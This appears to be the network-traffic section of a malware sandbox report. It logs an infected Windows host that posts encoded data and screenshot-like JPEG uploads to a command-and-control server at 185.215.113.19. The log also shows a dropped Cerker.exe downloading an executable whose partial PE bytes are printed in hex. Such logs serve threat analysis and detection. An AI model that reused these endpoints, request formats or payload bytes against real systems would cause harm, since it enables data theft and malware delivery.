Aug 31, 2024 22:42:19.619990110 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:19.649910927 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:20.176033974 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 31, 2024 22:42:20.227181911 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49770	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:18.895216942 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAyMjU2 Host: 185.215.113.19 Content-Length: 102408 Cache-Control: no-cache
Aug 31, 2024 22:42:18.895216942 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 79 4d 6a 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAyMjU2Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:18.895216942 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:18.895216942 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:18.895216942 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:18.895216942 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:18.895344019 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:18.895344019 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:18.895344019 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:18.895344019 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:18.895344019 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:20.863557100 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49771	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:20.326813936 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:21.165903091 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:21.193962097 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:21.555486917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49774	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:21.083477020 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTA2NjI3 Host: 185.215.113.19 Content-Length: 106779 Cache-Control: no-cache
Aug 31, 2024 22:42:21.083503008 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 32 4e 6a 49 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTA2NjI3Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:21.083581924 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:21.083623886 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:21.083623886 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:21.083682060 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:21.083682060 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:21.083683014 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:21.083745956 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:21.083745956 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:21.083745956 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:22.746999979 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:21.722982883 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:22.613323927 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:22.626655102 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:22.993093014 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	185.216.214.225	80	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:22.521344900 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:23.175786018 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:23 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:23.175798893 CEST	1236	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#Tau$,2dbQ
Aug 31, 2024 22:42:23.175812960 CEST	1236	IN	Data Raw: d3 a8 e4 58 2a 98 1e 63 71 4b 6f 72 d3 9b d0 e5 f7 91 c8 d8 81 8e ed c9 da 12 58 56 62 9c ba 5e af 71 87 6f 0a f8 1b 2c e0 3e cb 43 f6 5f 3c 22 7a e9 e1 26 17 6c a8 64 fd 88 94 84 86 79 fa 74 36 df 08 ea d6 dd 35 20 f9 83 0f 0d 31 cb 96 e9 a1 4e Data Ascii: X*cqKorXVb^qo,>C_<"z&ldyt65 1N,A[C~)A\-utu(Li7#-Sp+,"\}E7$BkCfUvk'<8t$4h}3Djrel`5NG'.o~"!U
Aug 31, 2024 22:42:23.175822973 CEST	1236	IN	Data Raw: d7 78 b5 74 70 4f 6b 98 da 97 8c ad bf 38 8a f4 36 46 30 1a 6d c4 e4 29 6a 3f 82 39 1d 6c ef 88 d7 e8 ab 7d 98 dc 9f f4 a8 61 b3 ae 58 a5 ab c2 1a 73 c7 c8 b2 ca 50 36 52 fe cc 7b 69 29 4c 0d 2b a6 49 af 86 35 12 a3 ce 45 01 e5 bc dc 39 2b db 5b Data Ascii: xtpOk86F0m)j?9l}aXsP6R{i)L+I5E9+[`J-)gH9` zs`;kW&:j5/bw8cuie2M4(0/xf0HU&#\.Y3n$A45ydW%PkUm2@j_^hQ<
Aug 31, 2024 22:42:23.175841093 CEST	1236	IN	Data Raw: 77 b8 e9 1d ee fc 08 3c 24 7f e5 54 42 ed ec b4 b1 1b b2 e6 2b 0b ef f9 f2 60 3b 0a 7d c3 6f 51 6a ba cd 2b 3b 75 fc 38 e1 6d c3 0e 76 95 d4 7f 59 bb 1e 99 f1 cc c8 19 32 8b c6 ca a2 2c 17 5a 81 92 db ed 4f eb bc 5c 57 de 5c a3 4c b9 63 be 40 ab Data Ascii: w<$TB+`;}oQj+;u8mvY2,ZO\W\Lc@O>m7%6~@=j:$[HD{[?>MBs\ONs5+_GijL`5Pn)c0CWV#mg3xm&eW,;zark
Aug 31, 2024 22:42:23.175853014 CEST	1236	IN	Data Raw: 3e 26 06 09 08 96 d2 f9 cc fe 32 fa ab 3a 2c 68 cb 80 81 0b 41 ef 4a 36 05 19 e6 80 f1 8a b0 22 b5 b1 8f a9 8b 72 1b 93 e9 7e 76 bb 3e 54 6e 67 21 c4 15 f6 8b bf 53 a4 ae 20 34 88 28 f3 d9 71 ea ee 94 e7 de f4 38 32 b8 4a 1f 4b aa 89 00 59 f6 7f Data Ascii: >&2:,hAJ6"r~v>Tng!S 4(q82JKY{v_\|:A&C5':1'bb7w0So<i0c<rN\|@0_a,RnrxAhm+#$ `b%/JdFXG*De {6?F#W
Aug 31, 2024 22:42:23.175864935 CEST	776	IN	Data Raw: cd 91 b4 e0 93 e5 28 4d 2f 60 4a 0c 36 60 3f 2e 04 41 fb ae 9d b4 5b 6d ca 14 ef 78 a1 6f a7 d0 8d d6 be 8c 9d b9 f0 3c 24 5a a0 75 63 6e 5b fe 0a 02 42 01 10 24 a9 5e 8c ce 03 c8 06 8f 18 e8 5b 5d d5 6e 41 68 43 0f 37 77 fe f8 70 fb 6a 6b 89 23 Data Ascii: (M/`J6`?.A[mxo<$Zucn[B$^[]nAhC7wpjk#7sn&-!xAc^\-)fLb8t9g3Lwd 8Rh>$gcBzIF5)i:]Q)bV,_E97sUo)Do<S_U/
Aug 31, 2024 22:42:23.175877094 CEST	1236	IN	Data Raw: 0c 79 39 88 bb f8 90 cd 08 ed e2 cb d9 a5 6e c2 8f 11 cb e2 e1 32 c7 c7 19 a6 8a 5c 30 13 a1 4e ed 82 54 01 a4 94 9f 4c 51 e6 04 db 13 4d 12 7b ab 3d 36 68 da 6b 9a d5 a3 44 7d d8 bb 49 ce 86 c1 cc ea 1e e5 13 17 a6 bd 9b 53 a5 f1 68 94 9f d8 00 Data Ascii: y9n2\0NTLQM{=6hkD}ISheah!Xv;ZO=Q(j\c&gurIZZC9[nuH:F:1EP'm:sq:~"}e.USw4ZBHHs}S
Aug 31, 2024 22:42:23.175947905 CEST	1236	IN	Data Raw: 67 1c e9 a3 c8 35 20 c1 d4 c5 f1 d2 a2 32 04 1a 4d 0c df f4 45 9e 84 a7 3d fe 52 5a 74 d7 08 fc 9d e7 48 3a ed de a5 74 93 06 59 81 01 3c 99 da 02 e5 c2 90 f8 e9 71 43 ee 02 4d 36 b7 bb 79 79 49 dc 9e 74 44 df 19 dc 36 45 99 43 6f 04 d5 c1 09 83 Data Ascii: g5 2ME=RZtH:tY<qCM6yyItD6ECo1aH}r t\%-2yOcxc.M^Q;tDU%o}sHyqiW%}aFS9yX]XU>du!Pb~[t'}HDRUV+-32;O'
Aug 31, 2024 22:42:23.175959110 CEST	1236	IN	Data Raw: 94 e9 7e d7 37 57 e0 1f 2d cf 25 7a 7f 0e 9f 1e 47 b6 bb 25 c8 bf 1b 67 72 23 d3 6d 73 a3 21 df 6f 03 80 9d 8f 3e d8 3e 39 f8 8a 44 48 a6 da 68 25 26 ef be ec cd 51 3d 06 6b 64 04 2c 24 b0 fb 96 31 5b b2 aa 4b 99 09 a5 1f 63 63 53 ba 19 96 0f aa Data Ascii: ~7W-%zG%gr#ms!o>>9DHh%&Q=kd,$1[KccS1.O2l}KW<G+QExFu:=fDBM:SLH:y"k*9_0!}\| cHpJ"s%nhO^)HbG.IF]
Aug 31, 2024 22:42:23.180803061 CEST	1236	IN	Data Raw: e0 cf 37 85 9a e9 1d c7 a2 a4 25 3a 41 d9 10 a2 a8 5c 09 14 c8 a0 ab 80 b7 f7 c1 f1 a8 27 03 85 6c e6 fe 1c 50 fa ad 77 17 d1 76 4a 21 bd bf fc 1d 52 df 0e c1 ef 66 78 c0 85 56 93 3c 90 4c a8 32 c2 0c 23 a1 93 26 c1 91 7e e3 2e e2 39 8e 0e 4e 40 Data Ascii: 7%:A\'lPwvJ!RfxV<L2#&~.9N@X{{T [4(fr&Dy3d_x2XP<I.8*ZGd&t^8b}Tw@J(C@;VyT_K.lq$so\M\|MVQa%rA#E<?kbA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49777	185.216.214.225	80	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:22.596395016 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:23.227549076 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:23 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:23.227627993 CEST	1236	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#Tau$,2dbQ
Aug 31, 2024 22:42:23.227639914 CEST	1236	IN	Data Raw: d3 a8 e4 58 2a 98 1e 63 71 4b 6f 72 d3 9b d0 e5 f7 91 c8 d8 81 8e ed c9 da 12 58 56 62 9c ba 5e af 71 87 6f 0a f8 1b 2c e0 3e cb 43 f6 5f 3c 22 7a e9 e1 26 17 6c a8 64 fd 88 94 84 86 79 fa 74 36 df 08 ea d6 dd 35 20 f9 83 0f 0d 31 cb 96 e9 a1 4e Data Ascii: X*cqKorXVb^qo,>C_<"z&ldyt65 1N,A[C~)A\-utu(Li7#-Sp+,"\}E7$BkCfUvk'<8t$4h}3Djrel`5NG'.o~"!U
Aug 31, 2024 22:42:23.227709055 CEST	672	IN	Data Raw: d7 78 b5 74 70 4f 6b 98 da 97 8c ad bf 38 8a f4 36 46 30 1a 6d c4 e4 29 6a 3f 82 39 1d 6c ef 88 d7 e8 ab 7d 98 dc 9f f4 a8 61 b3 ae 58 a5 ab c2 1a 73 c7 c8 b2 ca 50 36 52 fe cc 7b 69 29 4c 0d 2b a6 49 af 86 35 12 a3 ce 45 01 e5 bc dc 39 2b db 5b Data Ascii: xtpOk86F0m)j?9l}aXsP6R{i)L+I5E9+[`J-)gH9` zs`;kW&:j5/bw8cuie2M4(0/xf0HU&#\.Y3n$A45ydW%PkUm2@j_^hQ<
Aug 31, 2024 22:42:23.227720022 CEST	1236	IN	Data Raw: 99 60 63 8d 86 20 9c 3f 8f b0 58 6e 90 e7 8b f7 28 e2 d4 8e 6e 35 99 68 b8 94 b6 38 68 63 ff 9d d5 20 90 4c 69 2c 94 c3 dc 60 11 a7 26 96 9b 97 dd 25 fd ef bb 4c 62 23 f7 9c 46 a2 0c 42 f8 e2 69 df d0 88 51 0e 7e c1 8b 39 79 e9 41 5a 40 e7 8b cc Data Ascii: `c ?Xn(n5h8hc Li,`&%Lb#FBiQ~9yAZ@ %@@#Vm):uPfv_E[? K]}iq&ME+r4lvmj"S'qk=6G$D>\|@&?+j6#45*JQuRDkLE@:m6h
Aug 31, 2024 22:42:23.227729082 CEST	1236	IN	Data Raw: d7 2a 8f c2 cc 31 81 2a 79 c7 88 58 78 9f b0 51 55 58 90 0a da 3e d3 0b 6b 27 94 0e c6 59 67 14 3c 2f 52 c5 50 84 86 a4 12 af 2a dd 5f e1 ca 5d ae 92 a0 14 2d fb 0d 4f c4 2c b4 62 a1 bd 59 66 78 43 71 b8 92 31 11 c7 49 ce b8 e8 e0 85 c7 ea 86 19 Data Ascii: 1yXxQUX>k'Yg</RP_]-O,bYfxCq1Iw{`TrA,_\C8(q(u-k=yFvL)%k'S]`yf35-9H4o,t#b%RskoV+
Aug 31, 2024 22:42:23.227750063 CEST	1236	IN	Data Raw: d7 93 be 4e 99 c6 65 7d 8b 12 82 75 2d 12 4d bb e7 50 88 13 2a 08 e4 26 ea 4d b0 7d 67 54 72 30 21 50 17 21 88 15 5b f6 8d e6 37 b8 05 28 be e3 bf e1 49 20 38 ae 5d e1 c8 9a f5 59 1e 68 cd 9c ee eb 35 72 84 8c 59 00 66 38 d6 90 83 1c 0f af ee a2 Data Ascii: Ne}u-MP&M}gTr0!P![7(I 8]Yh5rYf8m`1v_hKA74[\|rG:htEo4[H9 [JlIIm1"2y<.o#K-b~Gx)vpAUc2
Aug 31, 2024 22:42:23.227761030 CEST	672	IN	Data Raw: 95 68 7a 5e 18 61 af fc 24 fb 5a da 4a cf 4f 85 78 17 d9 98 a8 17 8b 9b d6 a9 30 b5 d1 34 e4 6d a6 7a ad c7 29 f7 1a 65 02 bf 5b a9 0b 24 fa c4 ce b7 75 9a 11 55 d0 fc 68 dd 1a 50 54 20 45 6a 23 f9 05 bd bd 0c aa b6 0e cb 41 2e e9 9c 80 3b 2d e1 Data Ascii: hz^a$ZJOx04mz)e[$uUhPT Ej#A.;-W7i3y9n2\0NTLQM{=6hkD}ISheah!Xv;ZO=Q(j\c&gurIZZC9[n
Aug 31, 2024 22:42:23.227788925 CEST	1236	IN	Data Raw: a8 b4 df 58 8e ac 7a a5 8d 10 b5 20 85 44 e7 66 ae 43 7a 43 8b 9a e3 46 94 4f cc 96 52 04 49 57 58 b8 7f a4 68 0e c9 50 1a d6 39 1f 3e fe 6e 57 4d e2 fe 70 af 96 2b 4d 31 58 83 f5 8c c7 e0 e6 8c 03 bd 9f 95 dc c8 a8 76 94 8f be 64 7c 4f 12 90 ab Data Ascii: Xz DfCzCFORIWXhP9>nWMp+M1Xvd\|OZ(}e8)i6Dam=J!"E:xQYt"<D}s.>M`z<?S6nMK+.ioq2Sx\|tA6d~STu&HwI@'O6$/RO@w
Aug 31, 2024 22:42:23.227821112 CEST	1236	IN	Data Raw: c1 a9 55 64 02 e1 56 12 52 1d 61 6b 9f 75 66 0f f7 77 fe ae 4c 09 f9 9c 6a 1a e2 77 5f d5 b8 0f 57 75 84 96 d0 ab 75 e4 70 fd b4 6f b1 f2 16 6b ed ba be 8c 64 59 3d 30 bf 8f 28 a8 09 8c f8 ee 0b 3c d4 64 c3 dc 17 b1 b0 c8 b7 18 ae 2b 00 d0 9f 86 Data Ascii: UdVRakufwLjw_WuupokdY=0(<d+6_nh<}TKhY{-)*p_f4-(cU!^GD$9V:>Fk,8>if2u3`.s<'kaY
